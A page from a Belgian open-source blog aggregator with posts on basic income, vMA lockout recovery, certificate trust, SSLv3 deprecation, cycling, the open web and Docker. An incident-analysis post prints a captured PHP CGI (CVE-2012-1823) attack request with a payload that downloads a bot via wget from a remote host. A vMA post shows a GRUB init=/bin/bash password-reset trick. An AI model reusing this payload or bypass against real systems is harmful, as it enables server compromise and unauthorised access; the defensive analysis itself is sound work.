Subscriptions

Planet Grep is open to all people who either have the Belgian nationality or live in Belgium, and who actively work with or contribute to Open Source/Free software.

About Planet Grep...

Other planets can be found at the Planet Index.

A complete feed is available in a number of syndication formats: RSS 1.0, RSS 2.0, FOAF, and OPML.

The layout of this site was done by Gregory

June 29, 2015

Lionel Dricot

The 5 answers to those who want to preserve jobs

If you have been redirected to this page, it is because, in one way or another, you expressed concern about preserving a certain kind of job, or perhaps even proposed ideas to protect or create jobs.

The 5 arguments against preserving jobs

Each argument can be explored in more depth by clicking on the relevant link(s).

1. The primary purpose of technology is to make our lives easier and, consequently, to reduce our work. Destroying jobs is therefore not a side effect of anything: it is the very goal our species has been pursuing for millennia! And we are succeeding! Why would we want to go backwards in order to reach inefficient full employment?

2. Not working is not a problem. Not having money to live on is. We unfortunately tend to conflate work and social welfare. We are convinced that only work brings in money, but that is a completely mistaken belief. To dig deeper: What is work?

3. Trying to create jobs amounts to digging holes just to fill them back in. That is not only stupid, it is also counterproductive, and it amounts to building the most inefficient society possible!

4. If creating/preserving jobs is an admissible argument in a debate, then absolutely anything can be justified: from the destruction of our natural resources to torture and the death penalty, by way of sacrificing thousands of lives on the roads. This is what I call the executioner's argument.

5. Whatever your job, within the coming decade software will be able to do it better, faster and cheaper. This is of course obvious when we think of taxi/Uber drivers, but it also includes artists, politicians and even company executives.

Conclusion: worrying about jobs is dangerously backward-looking. It is not easy, because this superstition is drummed into our heads, but it is essential to move on to the next stage. Whether we like the idea or not, we already live in a society where not everyone works. That is a fact, and the future does not care about your opinion. The question is therefore not how to create/preserve jobs, but how to organize ourselves in a society where jobs are scarce.

Personally, I think that a basic income, in one form or another, is an avenue that deserves to be explored seriously.

Photo by Friendly Terrorist.

Thank you for taking the time to read this pay-what-you-want post. Feel free to support me with a few milliBitcoins, a handful of euros, or by following me on Tipeee, Twitter, Google+ and Facebook!

This text is published by Lionel Dricot under the CC-By BE license.

Flattr this!

by Lionel Dricot at June 29, 2015 06:51 PM

Bert de Bruijn

How to solve "user locked out due to failed logins" in vSphere vMA

In vSphere 6, if the vi-admin account gets locked because of too many failed logins, and you don't have the root password of the appliance, you can reset the account(s) using these steps:

  1. reboot the vMA
  2. from GRUB, "e"dit the entry
  3. "a"ppend init=/bin/bash
  4. "b"oot
  5. # pam_tally2 --user=vi-admin --reset
  6. # passwd vi-admin # Optional. Only if you want to change the password for vi-admin.
  7. # exit
  8. reset the vMA
  9. log in with vi-admin
These steps can be repeated for root or any other account that gets locked out.

If you do have root or vi-admin access, "sudo pam_tally2 --user=mylockeduser --reset" would do it, no reboot required.
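If you just want to see how bad things are before touching anything, pam_tally2 without the --reset flag only prints the current failure counter; a minimal sketch (run as root or via sudo):

# Show the current failed-login counter for vi-admin (read-only)
sudo pam_tally2 --user=vi-admin
# Clear the counter once you are sure you want to unlock the account
sudo pam_tally2 --user=vi-admin --reset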

by Bert de Bruijn (noreply@blogger.com) at June 29, 2015 01:13 PM

Laurent Bigonville

systemd integration in the “ps” command

In Debian, since version 2:3.3.10-1, the procps package has the systemd integration bits enabled. This means that now the “ps” command can display which (user) unit has started a process or to which slice or scope it belongs.

For example with the following command:

ps -eo pid,user,command,unit,uunit,slice

[Screenshot: ps output showing the unit, uunit and slice columns]
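The same column list also works for a single process, which is handy when checking where one particular daemon ended up; a small sketch (sshd is just an example, any PID works):

# Show the unit, user unit and slice for the ssh daemon only
ps -o pid,user,command,unit,uunit,slice -p "$(pidof sshd)"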

by bigon at June 29, 2015 10:29 AM

June 27, 2015

Mattias Geniar

The Broken State of Trust In Root Certificates

The post The Broken State of Trust In Root Certificates appeared first on ma.ttias.be.

Yesterday news came out that Microsoft has quietly pushed new Root Certificates via its Windows Update system.

The change happened without any notifications, without any KB and without anyone really paying attention to it.

Earlier this month, Microsoft has quietly started pushing a bunch of new root certificates to all supported Windows systems. What is concerning is that they did not announce this change in any KB article or advisory, and the security community doesn't seem to have noticed this so far.

Even the official Microsoft Certificate Program member list makes no mention of these changes whatsoever.

Microsoft quietly pushes 18 new trusted root certificates

This just goes to show how fragile our system of trust really is. Adding new Root Certificates to an OS essentially gives the owner of that certificate (indirect) root privileges on the system.

It may not allow direct root access to your machines, but it allows them to publish certificates your PC/server blindly trusts.

This is an open door for phishing attacks with drive-by downloads.

I think this demonstrates 2 very major problems with SSL Certificates we have today:

  1. Nobody checks which root certificates are currently trusted on your machine(s).
  2. Our software vendors can push new Root Certificates in automated updates without anyone knowing about it.

Both problems come back to the basis of trust.

Should we blindly trust our OS vendors to be able to ship new Root Certificates without confirmation, publication or dialog?

Or do we truly not care at all, as demonstrated by the fact we don't audit/validate the Root Certificates we have today?
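Doing that audit is not hard, at least on the Linux side; a minimal sketch (the path below is what Debian/Ubuntu use, other distros and Windows keep their trust store elsewhere):

# List the subject of every CA certificate your system currently trusts
for cert in /etc/ssl/certs/*.pem; do
    openssl x509 -noout -subject -in "$cert"
done | sort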

The post The Broken State of Trust In Root Certificates appeared first on ma.ttias.be.

by Mattias Geniar at June 27, 2015 12:53 PM

June 26, 2015

Xavier Mertens

Attackers Make Mistakes But SysAdmins Too!

A few weeks ago I blogged about “The Art of Logging” and explained why it is important to log efficiently to increase the chances of catching malicious activities. There are other ways to catch bad guys, especially when they make mistakes; after all, they are humans too! But it goes the other way around with system administrators as well. Last week, a customer asked me to investigate a suspicious alert reported by an IDS. It looked like a restricted web server (read: one that was not supposed to be publicly available!) was hit by an attack coming from the wild Internet.

The attack was nothing special: it was a bot scanning for websites vulnerable to the rather old PHP CGI-BIN vulnerability (CVE-2012-1823). The initial HTTP request looked strange:

POST
//%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%
75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F
%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%
66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6
E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A
%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%
3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3
D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F
%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: -c
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Oracle-ECID: 252494263338,0
ClientIP: xxx.xxx.xxx.xxx
Chronos: aggregate
SSL-Https: off
Calypso-Control: H_Req,180882440,80
Surrogate-Capability: orcl="webcache/1.0 Surrogate/1.0 ESI/1.0 ESI-Inline/1.0 ESI-INV/1.0 ORAESI/9.0.4 POST-Restore/1.0"
Oracle-Cache-Version: 10.1.2
Connection: Keep-Alive, Calypso-Control

<? system("cd /tmp;wget ftp://xxxx:xxxx\@xxx.xxx.xxx.xxx/bot.php"); ?>

Once decoded, the HTTP query looks familiar:

POST //cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -d auto_prepend_file=php://input –n
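If you want to decode this kind of request yourself, a tiny bash helper is enough; a sketch that assumes plain %XX encoding (no '+' for spaces):

# URL-decode a string by turning each %XX sequence into \xXX and letting printf expand it
urldecode() { printf '%b' "${1//%/\\x}"; }
urldecode '//%63%67%69%2D%62%69%6E/%70%68%70'
# prints: //cgi-bin/php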

Did you see that the ‘Host’ header contains an invalid value (‘-c’)? I tried to make sense of it, but to me it looks like a bug in the attacker’s code. RFC 2616 covers the HTTP/1.1 protocol and, more precisely, how requests are formed:

$ nc blog.rootshell.be 80
GET / HTTP/1.1
Host: blog.rootshell.be
HTTP/1.1 200 OK

In the case above, the request was clearly malformed and the reverse proxy sitting in front of the web server decided to forward it to its default backend. If a reverse proxy can’t find a valid host to send an incoming request to, it will, based on its configuration, fall back to the default one. Let’s take an Apache config:

NameVirtualHost *
<VirtualHost *>
DocumentRoot /siteA/
ServerName www.domainA.com
</VirtualHost>
<VirtualHost *>
DocumentRoot /siteB/
ServerName www.domainB.com
</VirtualHost>

In this example, Apache will use the first block if no other matching block is found. If we query a virtual host ‘www.domainC.com‘, we will receive the homepage of ‘www.domainA.com‘. Note that such a configuration may expose sensitive data to the wild or expose a vulnerable server to the Internet. To prevent this, always add a default site with an extra block on top of the configuration:

<VirtualHost *>
DocumentRoot /defaultSite/
</VirtualHost>

This site can be configured as a “last resort web page” (as implemented in many load balancers), and why not run a honeypot on it to collect juicy data? Conclusion: from a defender’s point of view, try to isolate invalid queries as much as possible and log everything. From an attacker’s point of view, always try malformed HTTP queries; maybe you will find interesting websites hosted on the same server!

by Xavier at June 26, 2015 10:21 PM

Mattias Geniar

RFC 7568: SSL 3.0 Is Now Officially Deprecated

The post RFC 7568: SSL 3.0 Is Now Officially Deprecated appeared first on ma.ttias.be.

The IETF has taken an official stance in the matter: SSL 3.0 is now deprecated.

It's been a long time coming. We've had, as many others, SSL 3.0 disabled on all our servers for multiple years now. And I'm now happy to report the IETF is making the end of SSL 3.0 "official".

The Secure Sockets Layer version 3.0 (SSLv3), as specified in RFC 6101, is not sufficiently secure. This document requires that SSLv3 not be used.

The replacement versions, in particular, Transport Layer Security (TLS) 1.2 (RFC 5246), are considerably more secure and capable protocols.

RFC 7568: Deprecating Secure Sockets Layer Version 3.0

Initiatives like disablessl3.com have been around for quite a while, urging system administrators to disable SSLv3 wherever possible. With POODLE as its most known attack, the death of SSLv3 is a very welcome one.
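Checking whether one of your own endpoints still accepts SSLv3 takes a single OpenSSL command; a sketch (example.com is a placeholder, and the -ssl3 option only exists in OpenSSL builds that still ship SSLv3 support):

# Try to force an SSLv3-only handshake; a "handshake failure" alert means SSLv3 is disabled
echo | openssl s_client -connect example.com:443 -ssl3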

The RFC targets everyone using SSL 3.0: servers as well as clients.

Pragmatically, clients MUST NOT send a ClientHello with ClientHello.client_version set to {03,00}.

Similarly, servers MUST NOT send a ServerHello with ServerHello.server_version set to {03,00}. Any party receiving a Hello message with the protocol version set to {03,00} MUST respond with a "protocol_version" alert message and close the connection.

SSL is dead. Long live TLS 1.2(*).

(*) while it lasts.

The post RFC 7568: SSL 3.0 Is Now Officially Deprecated appeared first on ma.ttias.be.

by Mattias Geniar at June 26, 2015 07:39 PM

Frank Goossens

Music from Our Tube; Souldancing on a Friday

While listening to random old “It is what it is” shows (Merci Laurent) I heard this re-issue of Heiko Laux‘s Souldancer. Now go have some fun, you kids!

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at June 26, 2015 11:25 AM

June 25, 2015

Joram Barrez

All Activiti Community Day 2015 Online

As promised in my previous post, here are the recordings of the talks done by our awesome Community people. The order below is the order at which they were planned in the agenda (no favouritism!). Sadly, the camera battery died during the recording of the talks before lunch. As such, the talks of Yannick Spillemaeckers […]

by Joram Barrez at June 25, 2015 12:04 PM

June 23, 2015

Lionel Dricot

“Gravel”, or when cyclists chow down on gravel

Warning: this bolg really is a bolg about cyclimse. Thank you for your understanding!

In this article, I would like to introduce a cycling discipline that is very popular in the United States: “gravel grinding”, literally grinding gravel, more often simply called “gravel”.

But for those who are not familiar with cycling, I will first explain why there are several types of bikes and several ways of riding a bike.

The different types of cycling

You have surely noticed that the bikes ridden by Tour de France racers are very different from the mountain bike your little niece just got.

A road cyclist, by Tim Shields.

Indeed, depending on the course, the cyclist faces different obstacles. On a long road in a windy environment, the cyclist is mainly held back by air resistance, so the rider needs to be aerodynamic. On a narrow mountain switchback, the cyclist fights gravity and therefore needs to be as light as possible. On the other hand, on a rocky trail descending between the trees, the cyclist’s main concern is keeping the wheels in contact with the ground and not breaking any equipment. The bike must therefore absorb shocks and the roughness of the terrain as much as possible.

Finally, a utility bike aims to maximize the rider’s comfort and the bike’s practicality, even at the cost of a drastic drop in performance.

Technological trade-offs

Today, bikes are therefore classified according to their use. A very aerodynamic bike is used for time-trial competitions or triathlons. For classic races, the pros use an “aero” road bike, or an ultralight bike in the mountains.

An aerodynamic time-trial bike, by Marc

For riding in the woods, a mountain bike is preferred, but mountain bikes themselves come in several flavours, the furthest from the road bike being the downhill bike, which is very heavy, loaded with suspension and, as its name suggests, only usable going downhill.

That said, most of these categories stem from technological constraints. Couldn’t we imagine an ultralight bike (suited to the mountains) that is also ultra-aerodynamic (suited to the road or time trials) and ultra-comfortable (suited to the city)? Yes, we can imagine it. It is not possible yet, and nothing says it ever will be. But it is not theoretically impossible.

The physical trade-off

There is, however, one trade-off that is physically indisputable: efficiency versus damping. Any damping causes a loss of efficiency; that is unavoidable.

Damping has two functions: keeping the bike in contact with the road even on an uneven surface, and preserving the physical integrity of the bike, not to mention the comfort of the rider.

The cyclist moves forward by applying a force to the road through the drivetrain and the tires. The action-reaction principle means the road applies a proportional force back onto the bike, which is what pushes it forward.

Damping, on the other hand, is meant to dissipate the forces the road transmits to the bike. Physically, it is thus clear that efficiency and damping are diametrically opposed.

A downhill bike, by Matthew.

To convince yourself, just borrow a bike with suspension and set it to maximum damping. Then try to climb a steeply rising road for several hundred metres. You will immediately feel that every pedal stroke is partially absorbed by the bike.

Show me your tires and I will tell you who you are…

The main damper, present on every type of bike without exception, is the tire. The tire is filled with air, and the compression of that air absorbs shocks.

A widespread idea holds that road bikes have thin tires because wide tires would increase friction on the road. That is completely false. In fact, every tire is designed to grip the road as much as possible, because it is this friction that transmits the energy. A tire that does not grip the road spins, which is something to be avoided at all costs.

It has even been shown that wider tires transmit more energy to the road and are more efficient. That is one of the reasons Formula 1 cars have very wide tires.

However, very wide tires also mean more air and therefore more damping. Wide tires thus dissipate more energy with every pedal stroke!

Mountain bike wheels, by Vik Approved.

That is why road bikes have very thin tires (between 20 and 28 mm wide), which are also inflated to very high pressure (more than 6 bars). With the amount of air being very small and highly compressed, damping is minimal.

Wide tires, on the other hand, deform to hug the contours of uneven ground. By absorbing shocks, they are also less prone to punctures. That is why mountain bikes have tires that are generally more than 40 mm wide and inflated to lower pressure (between 2 and 4 bars). Thinner tires would spin (loss of grip) and puncture at the slightest impact.

In short, the tire is certainly the element that defines a bike the most; it is truly its identity card. To learn more, here is a very interesting link about tire rolling resistance.

Between the road bike and the mountain bike

We have thus defined two big families of sporting bikes. First, road bikes, with tires under 30 mm, built for speed on a relatively smooth surface but unable to ride off the tarmac. Then mountain bikes, with tires over 40 mm, able to go anywhere but so inefficient on the road that it is better to drive them by car to wherever you want to ride. There are plenty of other types of bikes, but they are less performance-oriented: the city bike, inspired by the mountain bike, which optimizes practicality; the “Dutch bike”, which optimizes comfort in a completely flat country with well-maintained cycle paths; or the fixie, which optimizes the hipster factor of its owner.

But couldn’t we imagine a performance-oriented bike that is efficient on the road and can go anywhere a mountain bike can?

To answer that question, we need to look at a discipline that is particularly popular in Belgium: cyclocross. Cyclocross consists of taking a road bike, fitting it with slightly wider tires (between 30 and 35 mm) and riding it through the mud in winter. When the mud gets too deep or the terrain too steep, the rider gets off the bike, shoulders it and runs while carrying it. The idea is that, in those situations, it is faster anyway to run (10-12 km/h) than to pedal (8-10 km/h).

A cyclocross racer, by Sean Rowe

A cyclocross bike therefore has to be light (so it can be carried), able to ride and corner in the mud, but with minimal damping so that it stays fast on the smoother sections.

This kind of setup turns out to be quite efficient on the road: a cyclocross bike cruises above 30 km/h without difficulty, yet can also keep up with a traditional mountain bike on forest trails. The reduced damping does force you to slow down on very rough descents, and the most technical climbs on the muddiest ground require carrying the bike (sometimes with the unexpected result of overtaking mountain bikers spinning away in their lowest gear).

The birth of gravel

While a road race can cover long distances between a start and a finish line, cyclocross, mountain biking and the other disciplines are traditionally confined to a short circuit that the competitors ride several times. The first reason is that nowadays it is hard to design a long course that does not end up on the road.

Moreover, while motorbikes and cars can escort road bikes to provide food, technical support and media coverage, the same is not true for mountain bikes. It is therefore impossible to properly film a mountain bike or cyclocross race contested over dozens of kilometres through the woods.

The kind of road that gives the discipline its name.

The underlying idea of “gravel” is to break free of those constraints and offer long races (sometimes several hundred kilometres) between a start and a finish, but passing over trails, sunken lanes and, above all, those long gravel roads that criss-cross the United States between the fields and gave the discipline its name. Stretches of asphalt road are also allowed.

Feed stations are set up by the organizers along the course but, between those points, the rider is usually left to fend for themselves. Carrying inner tubes, repair kit and band-aids is therefore part of the sport!

As for media coverage, it is now provided by the riders themselves, thanks to cameras mounted on the bikes or on their helmets.

The rise of gravel

At heart, there is nothing really new here. The word “gravel” is just a new name stuck onto a discipline as old as the bicycle itself. But that word has allowed a rebirth and a recognition of the concept.

The success of on-board videos of riders covering 30 km across the fields and 10 km on asphalt before attacking 500 m of muddy climbs and fording a river with the bike on their shoulder is helping to popularize “gravel”, mainly in the United States, where cyclocross is also booming.

The popularity of races such as Barry-Roubaix (you couldn’t make that name up!) or the Gold Rush Gravel Grinder has caught the attention of manufacturers, who are starting to offer frames, tires and gear designed specifically for gravel.

Getting into gravel?

Unlike road cycling or mountain biking on a circuit, gravel has a romantic side. Adventure, getting lost, exploring and discovering are an integral part of the discipline. In the Deux Norh team, for example, rides are called “hunts”. The point is not so much the athletic feat as telling an adventure, a story.

The author of these lines during a climb through the woods.

Gravel being, in essence, a compromise, cyclocross bikes are often the best suited for it. In fact, many experienced cyclists say that if they could only keep one bike for everything, it would be their cyclocross bike. That said, it is entirely possible to ride gravel on a hardtail mountain bike (no rear suspension). The mountain bike is more comfortable and handles technical sections more easily, at the cost of lower speed on the faster-rolling sections. For the sandiest courses, some even go for ultra-wide tires (“fat bikes”).

On the other hand, I have never yet seen a gravel club or a single organized race in Belgium. That is why I invite Belgian cyclists to join the Belgian Gravel Grinders team on Strava, so that solitary gravel riders can band together and, why not, organize group rides.

If the adventure tempts you, don’t hesitate to join the team on Strava. And if you happen to be buying a new bike and are hesitating between a mountain bike and a road bike, take a look at cyclocross bikes. You never know when you might suddenly feel like chowing down on some gravel!

Cover photo by the author.

Thank you for taking the time to read this pay-what-you-want post. Feel free to support me with a few milliBitcoins, a handful of euros, or by following me on Tipeee, Twitter, Google+ and Facebook!

This text is published by Lionel Dricot under the CC-By BE license.

Flattr this!

by Lionel Dricot at June 23, 2015 04:17 PM

Dries Buytaert

Winning back the Open Web

The web was born as an open, decentralized platform allowing different people in the world to access and share information. I got online in the mid-nineties when there were maybe 100,000 websites in the world. Google didn't exist yet and Steve Jobs had not yet returned to Apple. I remember the web as an "open web" where no one was really in control and everyone was able to participate in building it. Fast forward twenty years, and the web has taken the world by storm. We now have hundreds of millions of websites. Look beyond the numbers and we see another shift: the rise of a handful of corporate "walled gardens" like Facebook, Google and Apple that are becoming both the entry point and the gatekeepers of the web. Their dominance has given rise to major concerns.

We call them "walled gardens" because they control the applications, content and media on their platform. Examples include Facebook or Google, which control what content we get to see; or Apple, which restricts us to running approved applications on iOS. This is in contrast to the "open web", where users have unrestricted access to applications, content and media.

Facebook is feeling the heat from Google, Google is feeling the heat from Apple but none of these walled gardens seem to be feeling the heat from an open web that safeguards our privacy and our society's free flow of information.

This blog post is the result of people asking questions and expressing concerns about a few of my last blog posts like the Big Reverse of the Web, the post-browser era of the web is coming and my DrupalCon Los Angeles keynote. Questions like: Are walled gardens good or bad? Why are the walled gardens winning? And most importantly; how can the open web win? In this blog post, I'd like to continue those conversations and touch upon these questions.

Are "walled gardens" good or bad for the web?

What makes this question difficult is that the walled gardens don't violate the promise of the web. In fact, we can credit them for amplifying the promise of the web. They have brought hundreds of millions of users online and enabled them to communicate and collaborate much more effectively. Google, Apple, Facebook and Twitter have a powerful democratizing effect by providing a forum for people to share information and collaborate; they have made a big impact on human rights and civil liberties. They should be applauded for that.

At the same time, their dominance is not without concerns. With over 1 billion users each, Google and Facebook are the platforms that the majority of people use to find their news and information. Apple has half a billion active iOS devices and is working hard to launch applications that keep users inside their walled garden. The two major concerns here are (1) control and (2) privacy.

First, there is the concern about control, especially at their scale. These organizations shape the news that most of the world sees. When too few organizations control the media and flow of information, we must be concerned. They are very secretive about their curation algorithms and have been criticized for inappropriate censoring of information.

Second, they record data about our behavior as we use their sites (and the sites their ad platforms serve), inferring information about our habits and personal characteristics, possibly including intimate details that we might prefer not to disclose. Every time Google, Facebook or Apple launch a new product or service, they are able to learn a bit more about everything we do and control a bit more about our life and the information we consume. They know more about us than any other organization in history, and do not appear to be restricted by data protection laws. They won't stop until they know everything about us. If that makes you feel uncomfortable, it should. I hope that one day, the world will see this for what it is.

While the walled gardens have a positive and democratizing impact on the web, who is to say they'll always use our content and data responsibly? I'm sure that to most critical readers of this blog, the open web sounds much better. All things being equal, I'd prefer to use alternative technology that gives me precise control over what data is captured and how it is used.

Why are the walled gardens winning?

Why then are these walled gardens growing so fast? If the open web is theoretically better, why isn't it winning? These are important questions about the future of the open web, open source software, web standards and more. It is important to think about how we got to a point of walled garden dominance before we can figure out how an open web can win.

The biggest reason the walled gardens are winning is because they have a superior user experience, fueled by data and technical capabilities not easily available to their competitors (including the open web).

Unlike the open web, walled gardens collect data from users, often in exchange for free use of a service. For example, having access to our emails or calendars is incredibly important because it's where we plan and manage our lives. Controlling our smartphones (or any other connected devices such as cars or thermostats) provides not only location data, but also a view into our day-to-day lives. Here is a quick analysis of the types of data top walled gardens collect and what they are racing towards:

Walled gardens data

On top of our personal information, these companies own large data sets ranging from traffic information to stock market information to social network data. They also possess the cloud infrastructure and computing power that enables them to plow through massive amounts of data and bring context to the web. It's not surprising that the combination of content plus data plus computing power enables these companies to build better user experiences. They leverage their data and technology to turn “dumb experiences” into smart experiences. Most users prefer smart contextual experiences because they simplify or automate mundane tasks.

Walled gardens technology

Can the open web win?

I still believe in the promise of highly personalized, contextualized information delivered directly to individuals, because people ultimately want better, more convenient experiences. Walled gardens have a big advantage in delivering such experiences, however I think the open web can build similar experiences. For the open web to win, we first must build websites and applications that exceed the user experience of Facebook, Apple, Google, etc. Second, we need to take back control of our data.

Take back control over the experience

The obvious way to build contextual experiences is by combining different systems that provide open APIs; e.g. we can integrate Drupal with a proprietary CRM and commerce platform to build smart shopping experiences. This is a positive because organizations can take control over the brand experience, the user experience and the information flow. At the same time, users don't have to trust a single organization with all of their data.

Open web current state

The current state of the web: one end-user application made up of different platforms that each have their own user experience and presentation layer and store their own user data.

To deliver the best user experience, you want “loosely-coupled architectures with a highly integrated user experience”. Loosely-coupled architectures, so you can build better user experiences by combining your systems of choice (e.g. integrate your favorite CMS with your favorite CRM with your favorite commerce platform). Highly-integrated user experiences, so you can build seamless experiences, not just for end-users but also for content creators and site builders. Today's open web is fragmented. Integrating two platforms often remains difficult and the user experience is "mostly disjointed" instead of "highly integrated". As our respective industries mature, we must focus our attention on integrating the user experience as well as the data that drives that user experience. The following "marketecture" illustrates that shift:

Shared integration and user experience layer

Instead of each platform having its own user experience, we have a shared integration and presentation layer. The central integration layer serves to unify data coming from distinctly different systems. Compatible with the "Big Reverse of the Web" theory, the presentation layer is not limited to a traditional web browser but could include push technology like a notification.

For the time being, we have to integrate with the big walled gardens. They need access to great content for their users. In return, they will send users to our sites. Content management platforms like Drupal have a big role to play, by pushing content to these platforms. This strategy may sound counterintuitive to many, since it fuels the growth of walled gardens. But we can't afford to ignore ecosystems where the majority of users are spending their time.

Control personal data

At the same time, we have to worry about how to leverage people's data while protecting their privacy. Today, each of these systems or components contain user data. The commerce system might have data about past purchasing behavior, the content management system about who is reading what. Combining all the information we have about a user, across all the different touch-points and siloed data sources will be a big challenge. Organizations typically don't want to share user data with each other, nor do users want their data to be shared without their consent.

The best solution would be to create a "personal information broker" controlled by the user. By moving the data away from the applications to the user, the user can control what application gets access to what data, and how and when their data is shared. Applications have to ask the user permission to access their data, and the user explicitly grants access to none, some or all of the data that is requested. An application only gets access to the data that we want to share. Permissions only need to be granted once but can be revoked or set to expire automatically. The application can also ask for additional permissions at any time; each time the person is asked first, and has the ability to opt out. When users can manage their own data and the relationships they have with different applications, and by extension with the applications' organizations, they take control over their own privacy. The government has a big role to play here; privacy law could help accelerate the adoption of "personal information brokers".

Open web personal information broker

Instead of each platform having its own user data, we move the data away from the applications to the users, managed by a "personal information broker" under the user's control.

Open web shared broker

The user's personal information broker manages data access to different applications.

Conclusion

People don't seem so concerned about their data being hosted with these walled gardens since they've willingly given it to date. For the time being, "free" and "convenient" will be hard to beat. However, my prediction is that these data privacy issues are going to come to a head in the next five to ten years, and lack of transparency will become unacceptable to people. The open web should focus on offering user experiences that exceed those provided by walled gardens, while giving users more control over their user data and privacy. When the open web wins through improved transparency, the closed platforms follow suit, at which point they'll no longer be closed platforms. The best case scenario is that we have it all: a better data-driven web experience that exists in service to people, not in the shadows.

by Dries at June 23, 2015 08:58 AM

Frank Goossens

Mobile web vs. Native apps; Forrester’s take

So is the web going away, being replaced by apps? Forrester researched it and does not agree:

Based on this data and other findings in the new report, Forrester advises businesses to design their apps only for their best and most loyal or frequent customers – because those are the only ones who will bother to download, configure and use the application regularly. For instance, most retailers say their mobile web sales outweigh their app sales, the report says. Meanwhile, outside of these larger players, many customers will use mobile websites instead of a business’ native app.

My biased interpretation: unless you think you can compete with Facebook for mobile users’ attention, mobile apps should maybe not be your most important investment. Maybe PPK conceded victory too soon after all?

by frank at June 23, 2015 07:45 AM

June 22, 2015

Frank Goossens

RIngland; the quietest summer hit?

So “Laat de mensen dansen” is being banned from VRT and Q-music because it is supposedly too political. I never thought Bart & Slongs would become the Flemish Johnny & Sid … Can I buy that record somewhere?

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at June 22, 2015 04:29 PM

June 21, 2015

Vincent Van der Kussen

A critical view on Docker

TL;DR Before you start reading this, I want to make it clear that I absolutely don't hate Docker or the application container idea in general, at all! I really see containers becoming a new way of doing things, in addition to the existing technologies. In fact, I use containers myself more and more.

Currently I'm using Docker for local development because it's so easy to get your environment up and running in just a few seconds. But of course, that is "local" development. Things start to get interesting when you want to deploy over multiple Docker hosts in a production environment.

At the "Pragmatic Docker Day" a lot of people who were using (some even in production) or experimenting with Docker showed up. Other people were completely new to Docker so there was a good mix.

During the Open Spaces in the afternoon we had a group of people who decided to stay outside (the weather was really too nice to stay inside) and started discussing the talks that were given in the morning sessions. This evolved into a rather good discussion about everyone's personal view on the current state of containers and what they might bring in the future. People chimed in and added their opinions to the conversation.

That inspired me to write about the following items, which are a combination of the things that came up during those conversations and my own view on the current state of Docker.

The Dockerfile

A lot of people are now using some configuration management tool and have invested quite some time in their tool of choice to deploy and manage the state of their infrastructure. Docker provides the Dockerfile to build/configure your container images, and it feels a bit like a "dirty" hack compared to the nicer features that config management tools provide.

Quite some people are using their config management tool to build their container images. I, for instance, upload my Ansible playbooks into the image (during the build) and then run them. This allows me to reuse existing work that I know works. And I can use it for both containers and non-containers.
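As a rough sketch of that workflow (the base image, the package installation step and the playbook name are all assumptions, not a recommendation):

FROM debian:jessie

# Install Ansible inside the build so existing playbooks can be reused as-is
RUN apt-get update && apt-get install -y ansible && rm -rf /var/lib/apt/lists/*

# Copy the playbooks into the image and apply them locally during the build
COPY playbooks/ /tmp/playbooks/
RUN ansible-playbook -i "localhost," -c local /tmp/playbooks/site.yml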

It would have been nice if Docker somehow provided a way to integrate the existing configuration management tools a bit better. Vagrant does a better job here.

As far as I know you also can't use variables (think Puppet Hiera or Ansible Inventory) inside your Dockerfile. Something configuration management tools happen to be very good at.

Bash scripting

When building more complex Docker images you notice that a lot of Bash scripting is used to prep the image and make it do what you want. Things like passing variables into configuration files, creating users, preparing storage, configuring and starting services, etc. While Bash is not necessarily a bad thing, it all feels like a workaround for things that are so simple when not using containers.

Dev vs Ops all over again?

The people I talked to agreed on the fact that Docker is rather developer focused and that it allows them to build images containing a lot of stuff that you might have no control over. It abstracts away possible issues. The container works, so all is well... right?

I believe that when you start building and using containers, the DevOps aspect is more important than ever. If, for instance, a CVE is found in a library/service that has been included in the container image, you'll need to update this in your base image and then roll it out through your deployment chain. To make this possible, all stakeholders must know what is included, and in which version of the Docker image. Needless to say, this needs both ops and devs working together. I don't think there's a need for "separation of concerns" as Docker likes to advocate. Haven't we learned that creating silos isn't the best idea?

More complexity

Everything in the way you used to work becomes different once you start using containers. The fact that you can't ssh into something or let your configuration management make some changes just feels awkward.

Networking

By default Docker creates a Linux Bridge on the host where it creates interfaces for each container that gets started. It then adjusts the iptables nat table to pass traffic entering a port on the host to the exposed port inside the container.
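You can see both halves of that mechanism with two commands; a small sketch (the nginx image and the port numbers are only examples):

# Publish container port 80 on host port 8080; Docker wires this up on the bridge
docker run -d --name web -p 8080:80 nginx

# Inspect the DNAT rule Docker added to the nat table for that mapping
sudo iptables -t nat -L DOCKER -n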

To have a more advanced network configuration you need to look at tools like weave, flannel, etc., which require more research to see what fits your specific use case best.

Recently I was wondering if it was possible to have multiple nics inside your container because I wanted this to test Ansible playbooks that configure multiple nics. Currently it's not possible but there's a ticket open on GitHub https://github.com/docker/docker/issues/1824 which doesn't give me much hope.

Service discovery

Once you go beyond playing with containers on your laptop and start using multiple Docker hosts to scale your applications, you need a way to know where the specific service you want to connect to is running and on what port. You probably don't want to manually define ports per container on each host because that will become tedious quite fast. This is where tools like Consul, etcd, etc. come in. Again some extra tooling/complexity.

Storage

You will always have something that needs persistence, and when you do, you'll need storage. Now, when using containers the Docker way, you are expected to put as much as possible inside the container image. But some things, like log files, configuration files, application-generated data, etc., are a moving target.

